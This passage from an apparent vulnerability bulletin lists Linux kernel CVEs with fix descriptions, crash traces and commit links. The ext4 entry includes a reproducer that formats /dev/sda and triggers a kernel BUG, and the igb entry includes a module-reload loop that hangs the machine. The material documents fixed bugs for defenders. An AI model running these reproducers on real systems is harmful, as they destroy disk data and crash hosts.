https://git.kernel.org/stable/c/b805d212c394f291f116b12c53401e7ba0c4d408 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix invalid free tracking in ext4_xattr_move_to_block() In ext4_xattr_move_to_block(), the value of the extended attribute which we need to move to an external block may be allocated by kvmalloc() if the value is stored in an external inode. So at the end of the function the code tried to check if this was the case by testing entry->e_value_inum. However, at this point, the pointer to the xattr entry is no longer valid, because it was removed from the original location where it had been stored. So we could end up calling kvfree() on a pointer which was not allocated by kvmalloc(); or we could also potentially leak memory by not freeing the buffer when it should be freed. Fix this by storing whether it should be freed in a separate variable. | 2025-12-24 | not yet calculated | CVE-2023-54062 | https://git.kernel.org/stable/c/76887be2a96193cd11be818551b8934ecdb3123f https://git.kernel.org/stable/c/f30f3391d089dc91aef91d08f4b04a6c0df2b067 https://git.kernel.org/stable/c/ba04d6af5ac440a6d5a2d35dc1d8e2cb0323550a https://git.kernel.org/stable/c/1a8822343e67432b658145d2760a524c884da9d4 https://git.kernel.org/stable/c/8beaa3cb293a8f7bacf711cf52201d59859dbc40 https://git.kernel.org/stable/c/c5fa4eedddd1c8342ce533cb401c0e693e55b4e3 https://git.kernel.org/stable/c/a18670395e5f28acddeca037c5e4bd2ea961b70a https://git.kernel.org/stable/c/b2fab1807d26acd1c6115b95b5eddd697d84751b https://git.kernel.org/stable/c/b87c7cdf2bed4928b899e1ce91ef0d147017ba45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix OOB read in indx_insert_into_buffer Syzbot reported an OOB read bug: BUG: KASAN: slab-out-of-bounds in indx_insert_into_buffer+0xaa3/0x13b0 fs/ntfs3/index.c:1755 Read of size 17168 at addr ffff8880255e06c0 by task syz-executor308/3630 Call Trace: <TASK> memmove+0x25/0x60 mm/kasan/shadow.c:54 indx_insert_into_buffer+0xaa3/0x13b0 fs/ntfs3/index.c:1755 indx_insert_entry+0x446/0x6b0 fs/ntfs3/index.c:1863 ntfs_create_inode+0x1d3f/0x35c0 fs/ntfs3/inode.c:1548 ntfs_create+0x3e/0x60 fs/ntfs3/namei.c:100 lookup_open fs/namei.c:3413 [inline] If the member struct INDEX_BUFFER *index of struct indx_node is incorrect, that is, the value of __le32 used is greater than the value of __le32 total in struct INDEX_HDR, an OOB read occurs when memmove is called in indx_insert_into_buffer(). Fix this by adding a check in hdr_find_e(). | 2025-12-24 | not yet calculated | CVE-2023-54063 | https://git.kernel.org/stable/c/cd7e1d67924081717c5c96ead758a1a77867689a https://git.kernel.org/stable/c/17048287ac79abd33b275ac3b5738285d406481b https://git.kernel.org/stable/c/a7e5dba10ba1402dd6c2f961a70320770865c4a5 https://git.kernel.org/stable/c/4bf3b564e27a518f158a83d5e1a50064ed6136a0 https://git.kernel.org/stable/c/b8c44949044e5f7f864525fdffe8e95135ce9ce5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:ssif: Fix a memory leak when scanning for an adapter The adapter scan ssif_info_find() sets info->adapter_name if the adapter info came from SMBIOS, as it's not set in that case. However, this function can be called more than once, and it will leak the adapter name if it had already been set. So check for NULL before setting it. | 2025-12-24 | not yet calculated | CVE-2023-54064 | https://git.kernel.org/stable/c/de677f4379fa67f650e367c188a0f80bee9b6732 https://git.kernel.org/stable/c/13623b966bb6d36ba61646b69cd49cdac6e4978a https://git.kernel.org/stable/c/3ad53071fe8547eb8d8813971844cc43246008ee https://git.kernel.org/stable/c/74a1194cce60a90723d0fe148863c18931a31153 https://git.kernel.org/stable/c/7db16d2e791bf2ec3e0249f56b7ec81c35bba6e6 https://git.kernel.org/stable/c/b870caeb18041f856893066ded81c560db3d56cc https://git.kernel.org/stable/c/b8d72e32e1453d37ee5c8a219f24e7eeadc471ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: realtek: fix out-of-bounds access The probe function sets priv->chip_data to (void *)priv + sizeof(*priv) with the expectation that priv has enough trailing space. However, only realtek-smi actually allocated this chip_data space. Do likewise in realtek-mdio to fix out-of-bounds accesses. These accesses likely went unnoticed so far, because of an (unused) buf[4096] member in struct realtek_priv, which caused kmalloc to round up the allocated buffer to a big enough size, so nothing of value was overwritten. With a different allocator (like in the barebox bootloader port of the driver) or with KASAN, the memory corruption becomes quickly apparent. | 2025-12-24 | not yet calculated | CVE-2023-54065 | https://git.kernel.org/stable/c/cc0f9bb99735d2b68fac68f37b585d615728ce5b https://git.kernel.org/stable/c/fe668aa499b4b95425044ba11af9609db6ecf466 https://git.kernel.org/stable/c/b93eb564869321d0dffaf23fcc5c88112ed62466 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer In gl861_i2c_master_xfer, msg is controlled by user. When msg[i].buf is null and msg[i].len is zero, former checks on msg[i].buf would be passed. Malicious data finally reach gl861_i2c_master_xfer. If accessing msg[i].buf[0] without sanity check, null ptr deref would happen. We add check on msg[i].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") | 2025-12-24 | not yet calculated | CVE-2023-54066 | https://git.kernel.org/stable/c/578b67614ae0e4fba3945b66a4c8f9ae77115bcb https://git.kernel.org/stable/c/2a33fc57133d6f39d62285df6706aeb1714967f1 https://git.kernel.org/stable/c/dfcd3c010209927b9f45b860f046635dc32e32e1 https://git.kernel.org/stable/c/72af676551efe820e309a6c7681c2c4372f37376 https://git.kernel.org/stable/c/b97719a66970601cd3151a3e2020f4454a1c4ff6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race when deleting free space root from the dirty cow roots list When deleting the free space tree we are deleting the free space root from the list fs_info->dirty_cowonly_roots without taking the lock that protects it, which is struct btrfs_fs_info::trans_lock. This unsynchronized list manipulation may cause chaos if there's another concurrent manipulation of this list, such as when adding a root to it with ctree.c:add_root_to_dirty_list(). This can result in all sorts of weird failures caused by a race, such as the following crash: [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.279928] Code: 85 38 06 00 (...) [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206 [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000 [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070 [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600 [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48 [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000 [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0 [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [337571.282874] Call Trace: [337571.283101] <TASK> [337571.283327] ? __die_body+0x1b/0x60 [337571.283570] ? die_addr+0x39/0x60 [337571.283796] ? exc_general_protection+0x22e/0x430 [337571.284022] ? asm_exc_general_protection+0x22/0x30 [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs] [337571.284803] ? _raw_spin_unlock+0x15/0x30 [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs] [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs] [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs] [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410 [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs] [337571.286358] ? mod_objcg_state+0xd2/0x360 [337571.286577] ? refill_obj_stock+0xb0/0x160 [337571.286798] ? seq_release+0x25/0x30 [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0 [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0 [337571.287455] ? __x64_sys_ioctl+0x88/0xc0 [337571.287675] __x64_sys_ioctl+0x88/0xc0 [337571.287901] do_syscall_64+0x38/0x90 [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc [337571.288352] RIP: 0033:0x7f478aaffe9b So fix this by locking struct btrfs_fs_info::trans_lock before deleting the free space root from that list. | 2025-12-24 | not yet calculated | CVE-2023-54067 | https://git.kernel.org/stable/c/6f1c81886b0b56cb88b311e5d2f203625474d892 https://git.kernel.org/stable/c/8ce9139aea5e60a247bde5af804312f54975f443 https://git.kernel.org/stable/c/babebf023e661b90b1c78b2baa384fb03a226879 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: compress: fix to call f2fs_wait_on_page_writeback() in f2fs_write_raw_pages() BUG_ON() will be triggered when writing files concurrently, because the same page is written back multiple times. 1597 void folio_end_writeback(struct folio *folio) 1598 { ...... 1618 if (!__folio_end_writeback(folio)) 1619 BUG(); ...... 1625 } kernel BUG at mm/filemap.c:1619! Call Trace: <TASK> f2fs_write_end_io+0x1a0/0x370 blk_update_request+0x6c/0x410 blk_mq_end_request+0x15/0x130 blk_complete_reqs+0x3c/0x50 __do_softirq+0xb8/0x29b ? sort_range+0x20/0x20 run_ksoftirqd+0x19/0x20 smpboot_thread_fn+0x10b/0x1d0 kthread+0xde/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x22/0x30 </TASK> Below is the concurrency scenario: [Process A] [Process B] [Process C] f2fs_write_raw_pages() - redirty_page_for_writepage() - unlock page() f2fs_do_write_data_page() - lock_page() - clear_page_dirty_for_io() - set_page_writeback() [1st writeback] ..... - unlock page() generic_perform_write() - f2fs_write_begin() - wait_for_stable_page() - f2fs_write_end() - set_page_dirty() - lock_page() - f2fs_do_write_data_page() - set_page_writeback() [2nd writeback] This problem was introduced by the previous commit 7377e853967b ("f2fs: compress: fix potential deadlock of compress file"). All pagelocks were released in f2fs_write_raw_pages(), but whether the page was in the writeback state was ignored in the subsequent writing process. Let's fix it by waiting for the page's writeback to finish before writing. | 2025-12-24 | not yet calculated | CVE-2023-54068 | https://git.kernel.org/stable/c/a8226a45b2a9ce83ba7a167a387a00fecc319e71 https://git.kernel.org/stable/c/169134da419cb8ffbe3b0743bc24573e16952ea9 https://git.kernel.org/stable/c/6604df2a9d07ba8f8fb1ac14046c2c83776faa4f https://git.kernel.org/stable/c/9940877c4fe752923a53f0f7372f2f152b6eccf0 https://git.kernel.org/stable/c/ad31eed06c3b4d63b2d38322a271d4009aee4bb3 https://git.kernel.org/stable/c/babedcbac164cec970872b8097401ca913a80e61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix BUG in ext4_mb_new_inode_pa() due to overflow When we calculate the end position of ext4_free_extent, this position may be exactly where ext4_lblk_t (i.e. uint) overflows. For example, if ac_g_ex.fe_logical is 4294965248 and ac_orig_goal_len is 2048, then the computed end is 0x100000000, which is 0. If ac->ac_o_ex.fe_logical is not the first case of adjusting the best extent, that is, new_bex_end > 0, the following BUG_ON will be triggered: ========================================================= kernel BUG at fs/ext4/mballoc.c:5116! invalid opcode: 0000 [#1] PREEMPT SMP PTI CPU: 3 PID: 673 Comm: xfs_io Tainted: G E 6.5.0-rc1+ #279 RIP: 0010:ext4_mb_new_inode_pa+0xc5/0x430 Call Trace: <TASK> ext4_mb_use_best_found+0x203/0x2f0 ext4_mb_try_best_found+0x163/0x240 ext4_mb_regular_allocator+0x158/0x1550 ext4_mb_new_blocks+0x86a/0xe10 ext4_ext_map_blocks+0xb0c/0x13a0 ext4_map_blocks+0x2cd/0x8f0 ext4_iomap_begin+0x27b/0x400 iomap_iter+0x222/0x3d0 __iomap_dio_rw+0x243/0xcb0 iomap_dio_rw+0x16/0x80 ========================================================= A simple reproducer demonstrating the problem: mkfs.ext4 -F /dev/sda -b 4096 100M mount /dev/sda /tmp/test fallocate -l1M /tmp/test/tmp fallocate -l10M /tmp/test/file fallocate -i -o 1M -l16777203M /tmp/test/file fsstress -d /tmp/test -l 0 -n 100000 -p 8 & sleep 10 && killall -9 fsstress rm -f /tmp/test/tmp xfs_io -c "open -ad /tmp/test/file" -c "pwrite -S 0xff 0 8192" We simply refactor the logic for adjusting the best extent by adding a temporary ext4_free_extent ex and use extent_logical_end() to avoid overflow, which also simplifies the code. | 2025-12-24 | not yet calculated | CVE-2023-54069 | https://git.kernel.org/stable/c/83ecffd40c65844a73c2e93d7c841455786605ac https://git.kernel.org/stable/c/58fe961c606c446f5612f6897827b1cac42c2e89 https://git.kernel.org/stable/c/f2c3a3aa6f11ad9878dbc3a067b0633e07b586c1 https://git.kernel.org/stable/c/fcefddf3a151b2c416b20120c06bb1ba9ad676fb https://git.kernel.org/stable/c/b7e9ec38b6a0beb5a49cd1e76be0a9a07c218e90 https://git.kernel.org/stable/c/bc056e7163ac7db945366de219745cf94f32a3e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: igb: clean up in all error paths when enabling SR-IOV After commit 50f303496d92 ("igb: Enable SR-IOV after reinit"), removing the igb module could hang or crash (depending on the machine) when the module has been loaded with the max_vfs parameter set to some value != 0. In case of one test machine with a dual port 82580, this hang occurred: [ 232.480687] igb 0000:41:00.1: removed PHC on enp65s0f1 [ 233.093257] igb 0000:41:00.1: IOV Disabled [ 233.329969] pcieport 0000:40:01.0: AER: Multiple Uncorrected (Non-Fatal) err0 [ 233.340302] igb 0000:41:00.0: PCIe Bus Error: severity=Uncorrected (Non-Fata) [ 233.352248] igb 0000:41:00.0: device [8086:1516] error status/mask=00100000 [ 233.361088] igb 0000:41:00.0: [20] UnsupReq (First) [ 233.368183] igb 0000:41:00.0: AER: TLP Header: 40000001 0000040f cdbfc00c c [ 233.376846] igb 0000:41:00.1: PCIe Bus Error: severity=Uncorrected (Non-Fata) [ 233.388779] igb 0000:41:00.1: device [8086:1516] error status/mask=00100000 [ 233.397629] igb 0000:41:00.1: [20] UnsupReq (First) [ 233.404736] igb 0000:41:00.1: AER: TLP Header: 40000001 0000040f cdbfc00c c [ 233.538214] pci 0000:41:00.1: AER: can't recover (no error_detected callback) [ 233.538401] igb 0000:41:00.0: removed PHC on enp65s0f0 [ 233.546197] pcieport 0000:40:01.0: AER: device recovery failed [ 234.157244] igb 0000:41:00.0: IOV Disabled [ 371.619705] INFO: task irq/35-aerdrv:257 blocked for more than 122 seconds. [ 371.627489] Not tainted 6.4.0-dirty #2 [ 371.632257] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this. [ 371.641000] task:irq/35-aerdrv state:D stack:0 pid:257 ppid:2 f0 [ 371.650330] Call Trace: [ 371.653061] <TASK> [ 371.655407] __schedule+0x20e/0x660 [ 371.659313] schedule+0x5a/0xd0 [ 371.662824] schedule_preempt_disabled+0x11/0x20 [ 371.667983] __mutex_lock.constprop.0+0x372/0x6c0 [ 371.673237] ? __pfx_aer_root_reset+0x10/0x10 [ 371.678105] report_error_detected+0x25/0x1c0 [ 371.682974] ? __pfx_report_normal_detected+0x10/0x10 [ 371.688618] pci_walk_bus+0x72/0x90 [ 371.692519] pcie_do_recovery+0xb2/0x330 [ 371.696899] aer_process_err_devices+0x117/0x170 [ 371.702055] aer_isr+0x1c0/0x1e0 [ 371.705661] ? __set_cpus_allowed_ptr+0x54/0xa0 [ 371.710723] ? __pfx_irq_thread_fn+0x10/0x10 [ 371.715496] irq_thread_fn+0x20/0x60 [ 371.719491] irq_thread+0xe6/0x1b0 [ 371.723291] ? __pfx_irq_thread_dtor+0x10/0x10 [ 371.728255] ? __pfx_irq_thread+0x10/0x10 [ 371.732731] kthread+0xe2/0x110 [ 371.736243] ? __pfx_kthread+0x10/0x10 [ 371.740430] ret_from_fork+0x2c/0x50 [ 371.744428] </TASK> The reproducer was a simple script: #!/bin/sh for i in `seq 1 5`; do modprobe -rv igb modprobe -v igb max_vfs=1 sleep 1 modprobe -rv igb done It turned out that this could only be reproduced on 82580 (quad and dual-port), but not on 82576, i350 and i210. Further debugging showed that igb_enable_sriov()'s call to pci_enable_sriov() is failing, because dev->is_physfn is 0 on 82580. Prior to commit 50f303496d92 ("igb: Enable SR-IOV after reinit"), igb_enable_sriov() jumped into the "err_out" cleanup branch. After this commit it only returned the error code. So the cleanup didn't take place, and the incorrect VF setup in the igb_adapter structure fooled the igb driver into assuming that VFs have been set up where no VF actually existed. Fix this problem by cleaning up again if pci_enable_sriov() fails. | 2025-12-24 | not yet calculated | CVE-2023-54070 | https://git.kernel.org/stable/c/0e3ea7e82a06014b9baf1b84ba579c38cbff3558 https://git.kernel.org/stable/c/bc6ed2fa24b14e40e1005488bbe11268ce7108fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: use work to update rate to avoid RCU warning The ieee80211_ops::sta_rc_update must be atomic, because ieee80211_chan_bw_change() holds rcu_read lock while calling drv_sta_rc_update(), so create a work to do original things. Voluntary context switch within RCU read-side critical section! WARNING: CPU: 0 PID: 4621 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x571/0x5d0 CPU: 0 PID: 4621 Comm: kworker/u16:2 Tainted: G W OE Workqueue: phy3 ieee80211_chswitch_work [mac80211] RIP: 0010:rcu_note_context_switch+0x571/0x5d0 Call Trace: <TASK> __schedule+0xb0/0x1460 ? __mod_timer+0x116/0x360 schedule+0x5a/0xc0 schedule_timeout+0x87/0x150 ? trace_raw_output_tick_stop+0x60/0x60 wait_for_completion_timeout+0x7b/0x140 usb_start_wait_urb+0x82/0x160 [usbcore usb_control_msg+0xe3/0x140 [usbcore rtw_usb_read+0x88/0xe0 [rtw_usb rtw_usb_read8+0xf/0x10 [rtw_usb rtw_fw_send_h2c_command+0xa0/0x170 [rtw_core rtw_fw_send_ra_info+0xc9/0xf0 [rtw_core drv_sta_rc_update+0x7c/0x160 [mac80211 ieee80211_chan_bw_change+0xfb/0x110 [mac80211 ieee80211_change_chanctx+0x38/0x130 [mac80211 ieee80211_vif_use_reserved_switch+0x34e/0x900 [mac80211 ieee80211_link_use_reserved_context+0x88/0xe0 [mac80211 ieee80211_chswitch_work+0x95/0x170 [mac80211 process_one_work+0x201/0x410 worker_thread+0x4a/0x3b0 ? process_one_work+0x410/0x410 kthread+0xe1/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54071 | https://git.kernel.org/stable/c/107677a8f43521e33e4a653e50fdf55ba622a4ce https://git.kernel.org/stable/c/dd3af22323e79a2ffabed366db20aab83716fe6f https://git.kernel.org/stable/c/bcafcb959a57a6890e900199690c5fc47da1a304 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: Fix potential data race at PCM memory allocation helpers The PCM memory allocation helpers have a sanity check against too many buffer allocations. However, the check is performed without a proper lock and the allocation isn't serialized; this allows a user to allocate more memory than the predefined max size. Practically seen, this isn't really a big problem, as it's more or less some "soft limit" as a sanity check, and it's not possible to allocate unlimitedly. But it's still better to address this for more consistent behavior. The patch covers the size check in do_alloc_pages() with the card->memory_mutex, and increases the allocated size there for preventing the further overflow. When the actual allocation fails, the size is decreased accordingly. | 2025-12-24 | not yet calculated | CVE-2023-54072 | https://git.kernel.org/stable/c/7e1d1456c8db9949459c5a24e8845cfe92430b0f https://git.kernel.org/stable/c/7e11c58b2620a22c67a5ae28d64ce383890ee9f4 https://git.kernel.org/stable/c/a0ab49e7a758b488b2090171a75d50735c0876f6 https://git.kernel.org/stable/c/3eb4e47a94e3f76521d7d344696db61e6a9619c7 https://git.kernel.org/stable/c/773ccad902f67583a58b5650a2f8d8daf2e76fac https://git.kernel.org/stable/c/bd55842ed998a622ba6611fe59b3358c9f76773d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Add !tpm_amd_is_rng_defective() to the hwrng_unregister() call site The following crash was reported: [ 1950.279393] list_del corruption, ffff99560d485790->next is NULL [ 1950.279400] ------------[ cut here ]------------ [ 1950.279401] kernel BUG at lib/list_debug.c:49! [ 1950.279405] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI [ 1950.279407] CPU: 11 PID: 5886 Comm: modprobe Tainted: G O 6.2.8_1 #1 [ 1950.279409] Hardware name: Gigabyte Technology Co., Ltd. B550M AORUS PRO-P/B550M AORUS PRO-P, BIOS F15c 05/11/2022 [ 1950.279410] RIP: 0010:__list_del_entry_valid+0x59/0xc0 [ 1950.279415] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 c6 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 08 a8 13 9e e8 b7 0a bc ff <0f> 0b 48 89 fe 48 c7 c7 38 a8 13 9e e8 a6 0a bc ff 0f 0b 48 89 fe [ 1950.279416] RSP: 0018:ffffa96d05647e08 EFLAGS: 00010246 [ 1950.279418] RAX: 0000000000000033 RBX: ffff99560d485750 RCX: 0000000000000000 [ 1950.279419] RDX: 0000000000000000 RSI: ffffffff9e107c59 RDI: 00000000ffffffff [ 1950.279420] RBP: ffffffffc19c5168 R08: 0000000000000000 R09: ffffa96d05647cc8 [ 1950.279421] R10: 0000000000000003 R11: ffffffff9ea2a568 R12: 0000000000000000 [ 1950.279422] R13: ffff99560140a2e0 R14: ffff99560127d2e0 R15: 0000000000000000 [ 1950.279422] FS: 00007f67da795380(0000) GS:ffff995d1f0c0000(0000) knlGS:0000000000000000 [ 1950.279424] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1950.279424] CR2: 00007f67da7e65c0 CR3: 00000001feed2000 CR4: 0000000000750ee0 [ 1950.279426] PKRU: 55555554 [ 1950.279426] Call Trace: [ 1950.279428] <TASK> [ 1950.279430] hwrng_unregister+0x28/0xe0 [rng_core] [ 1950.279436] tpm_chip_unregister+0xd5/0xf0 [tpm] Add the forgotten !tpm_amd_is_rng_defective() invariant to the hwrng_unregister() call site inside tpm_chip_unregister(). | 2025-12-24 | not yet calculated | CVE-2023-54073 | https://git.kernel.org/stable/c/1408d27f25c7b73ece7545cb6434965eedc49ddb https://git.kernel.org/stable/c/8da5ba044ea74105f3cfa182603b2f2d766fb22d https://git.kernel.org/stable/c/0af0a989e747248e05640980661225e5b94cdb9e https://git.kernel.org/stable/c/bd8621ca1510e6e802df9855bdc35a04a3cfa932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Use correct encap attribute during invalidation With introduction of post action infrastructure most of the users of encap attribute had been modified in order to obtain the correct attribute by calling mlx5e_tc_get_encap_attr() helper instead of assuming encap action is always on default attribute. However, the cited commit didn't modify mlx5e_invalidate_encap() which prevents it from destroying correct modify header action which leads to a warning [0]. Fix the issue by using correct attribute. [0]: Feb 21 09:47:35 c-237-177-40-045 kernel: WARNING: CPU: 17 PID: 654 at drivers/net/ethernet/mellanox/mlx5/core/en_tc.c:684 mlx5e_tc_attach_mod_hdr+0x1cc/0x230 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: RIP: 0010:mlx5e_tc_attach_mod_hdr+0x1cc/0x230 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: Call Trace: Feb 21 09:47:35 c-237-177-40-045 kernel: <TASK> Feb 21 09:47:35 c-237-177-40-045 kernel: mlx5e_tc_fib_event_work+0x8e3/0x1f60 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: ? mlx5e_take_all_encap_flows+0xe0/0xe0 [mlx5_core] Feb 21 09:47:35 c-237-177-40-045 kernel: ? lock_downgrade+0x6d0/0x6d0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x273/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x273/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: process_one_work+0x7c2/0x1310 Feb 21 09:47:35 c-237-177-40-045 kernel: ? lockdep_hardirqs_on_prepare+0x3f0/0x3f0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? pwq_dec_nr_in_flight+0x230/0x230 Feb 21 09:47:35 c-237-177-40-045 kernel: ? rwlock_bug.part.0+0x90/0x90 Feb 21 09:47:35 c-237-177-40-045 kernel: worker_thread+0x59d/0xec0 Feb 21 09:47:35 c-237-177-40-045 kernel: ? __kthread_parkme+0xd9/0x1d0 | 2025-12-24 | not yet calculated | CVE-2023-54074 | https://git.kernel.org/stable/c/00959a1bad58e4b6c14a2729f84d354255073609 https://git.kernel.org/stable/c/b8b4292fdd8818ab43b943b6717811651f51e39f https://git.kernel.org/stable/c/be071cdb167fc3e25fe81922166b3d499d23e8ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: common: Fix refcount leak in parse_dai_link_info Add missing of_node_put()s before the returns to balance of_node_get()s and of_node_put()s, which may get unbalanced in case the for loop 'for_each_available_child_of_node' returns early. | 2025-12-24 | not yet calculated | CVE-2023-54075 | https://git.kernel.org/stable/c/3e40722d55805584dc04d8594d912820cafb2432 https://git.kernel.org/stable/c/beed115c2ce78f990222a29abed042582df4e87c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix missed ses refcounting Use new cifs_smb_ses_inc_refcount() helper to get an active reference of @ses and @ses->dfs_root_ses (if set). This will prevent @ses->dfs_root_ses from being put in the next call to cifs_put_smb_ses() and thus potentially causing a use-after-free bug. | 2025-12-24 | not yet calculated | CVE-2023-54076 | https://git.kernel.org/stable/c/eb382196e6f6e05cfafdab797840e5a96c6e7bf0 https://git.kernel.org/stable/c/bf99f6be2d20146942bce6f9e90a0ceef12cbc1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix memory leak if ntfs_read_mft failed Label ATTR_ROOT in ntfs_read_mft() sets is_root = true and ni->ni_flags |= NI_FLAG_DIR, then the next attr will goto label ATTR_ALLOC and alloc ni->dir.alloc_run. However, the two states are not always consistent and can cause a memory leak. 1) attr_name in ATTR_ROOT does not fit the condition: it will set is_root = true but NI_FLAG_DIR is not set. 2) next attr_name in ATTR_ALLOC fits the condition and allocs ni->dir.alloc_run. 3) in cleanup function ni_clear(), when NI_FLAG_DIR is set, it frees ni->dir.alloc_run, otherwise it frees ni->file.run. 4) because NI_FLAG_DIR is not set in this case, ni->dir.alloc_run is leaked as kmemleak reported: unreferenced object 0xffff888003bc5480 (size 64): backtrace: [<000000003d42e6b0>] __kmalloc_node+0x4e/0x1c0 [<00000000d8e19b8a>] kvmalloc_node+0x39/0x1f0 [<00000000fc3eb5b8>] run_add_entry+0x18a/0xa40 [ntfs3] [<0000000011c9f978>] run_unpack+0x75d/0x8e0 [ntfs3] [<00000000e7cf1819>] run_unpack_ex+0xbc/0x500 [ntfs3] [<00000000bbf0a43d>] ntfs_iget5+0xb25/0x2dd0 [ntfs3] [<00000000a6e50693>] ntfs_fill_super+0x218d/0x3580 [ntfs3] [<00000000b9170608>] get_tree_bdev+0x3fb/0x710 [<000000004833798a>] vfs_get_tree+0x8e/0x280 [<000000006e20b8e6>] path_mount+0xf3c/0x1930 [<000000007bf15a5f>] do_mount+0xf3/0x110 ... Fix this by always setting is_root and NI_FLAG_DIR together. | 2025-12-24 | not yet calculated | CVE-2023-54077 | https://git.kernel.org/stable/c/3030f2b9b3329db3948c1a145a5493ca6f617d50 https://git.kernel.org/stable/c/1bc6bb657dfb0ab3b94ef6d477ca241bf7b6ec06 https://git.kernel.org/stable/c/93bf79f989688852deade1550fb478b0a4d8daa8 https://git.kernel.org/stable/c/3bb0d3eb475f01744ce6d6e998dfbd80220852a1 https://git.kernel.org/stable/c/bfa434c60157c9793e9b12c9b68ade02aff9f803 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: max9286: Free control handler The control handler is leaked in some probe-time error paths, as well as in the remove path. Fix it. | 2025-12-24 | not yet calculated | CVE-2023-54078 | https://git.kernel.org/stable/c/9a3a907cf69f804eb41ece5c079720d1a6a15aa1 https://git.kernel.org/stable/c/1ad4b8c4552b4096dfc86531462dc1899f96af94 https://git.kernel.org/stable/c/1e9fc6c473210138eff3425a6136f0a9bf4eb0ae https://git.kernel.org/stable/c/0f25f99dacc72bce7d4128f7a254b23f1a343cc7 https://git.kernel.org/stable/c/19f36204dbe28bf4ec0149e87e9996a56af4e654 https://git.kernel.org/stable/c/bfce6a12e5ba1edde95126aa06778027f16115d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq27xxx: Fix poll_interval handling and races on remove Before this patch bq27xxx_battery_teardown() was setting poll_interval = 0 to avoid bq27xxx_battery_update() requeuing the delayed_work item. There are 2 problems with this: 1. If the driver is unbound through sysfs, rather than the module being rmmod-ed, this changes poll_interval unexpectedly 2. This is racy, after it being set poll_interval could be changed before bq27xxx_battery_update() checks it through /sys/module/bq27xxx_battery/parameters/poll_interval Fix this by adding a removed attribute to struct bq27xxx_device_info and using that instead of setting poll_interval to 0. There also is another poll_interval related race on remove(), writing /sys/module/bq27xxx_battery/parameters/poll_interval will requeue the delayed_work item for all devices on the bq27xxx_battery_devices list and the device being removed was only removed from that list after cancelling the delayed_work item. Fix this by moving the removal from the 